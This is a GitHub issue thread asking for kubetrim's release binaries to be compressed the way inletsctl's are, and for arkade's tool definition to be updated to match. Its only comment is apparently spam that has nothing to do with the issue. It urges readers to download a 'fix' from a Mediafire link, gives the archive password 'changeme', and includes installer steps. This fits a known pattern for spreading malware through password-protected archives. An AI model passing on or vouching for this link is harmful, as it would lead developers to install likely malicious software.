### ISSUE TITLE
Compress release binaries

### ISSUE THREAD

**Issue by alexellis** [alexellis/kubetrim#3]
Compress release binaries using the same approach that inletsctl uses, due to the larger size of binaries including the client-go from Kubernetes.

A quick test showed the 32.9MB binary for Linux was compressed to a 9.5MB tgz file.

https://github.com/inlets/inletsctl/blob/master/Makefile

After updating the Makefile for kubetrim, the tool definition in arkade wll also need to be updated to uncompress the tar/zip depending on the architecture. Again, copy the example of inletsctl in arkade.

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
